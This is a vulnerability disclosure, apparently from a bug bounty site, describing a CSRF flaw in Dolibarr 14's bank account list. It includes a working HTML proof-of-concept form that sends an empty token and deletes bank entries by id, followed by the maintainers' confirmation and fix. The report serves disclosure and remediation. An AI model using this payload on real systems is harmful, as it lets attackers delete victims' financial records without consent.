Cross-Site Request Forgery (CSRF) in dolibarr/dolibarr

Valid

Reported on

Jul 21st 2021


✍️ Description

In Bank section the Bank | Cash part, you protect List entities to delete with CSRF attacks but if I set CSRF token to nothings then I able to delete arbitrary List entities only with knowing their ids.

🕵️‍♂️ Proof of Concept

// PoC.html

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.dolibarr.org/compta/bank/list.php" method="POST">
<input type="hidden" name="token" value="" />
<input type="hidden" name="formfilteraction" value="list" />
<input type="hidden" name="action" value="list" />
<input type="hidden" name="sortfield" value="b&#46;label" />
<input type="hidden" name="sortorder" value="ASC" />
<input type="hidden" name="contextpage" value="bankaccountlist" />
<input type="hidden" name="page" value="0" />
<input type="hidden" name="search&#95;status" value="opened" />
<input type="hidden" name="pageplusoneold" value="1" />
<input type="hidden" name="action" value="delete" />
<input type="hidden" name="token" value="" />
<input type="hidden" name="confirm" value="yes" />
<input type="hidden" name="search&#95;ref" value="" />
<input type="hidden" name="search&#95;label" value="" />
<input type="hidden" name="search&#95;status" value="opened" />
<input type="hidden" name="selectedfields" value="b&#46;ref&#44;b&#46;label&#44;accountype&#44;b&#46;account&#95;number&#44;b&#46;fk&#95;accountancy&#95;journal&#44;toreconcile&#44;b&#46;datec&#44;b&#46;tms&#44;b&#46;clos&#44;balance&#44;" />
<input type="hidden" name="toselect&#91;&#93;" value="256" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

💥 Impact

This vulnerability is capable of delete mentioned List entities from tools section. version of application == 14 (tested on demo website)

We have contacted a member of the dolibarr team and are waiting to hear back a year ago
amammad modified the report
a year ago
Laurent Destailleur confirmed that a fix has been merged on 0749d0 a year ago
Laurent Destailleur has been awarded the fix bounty
to join this conversation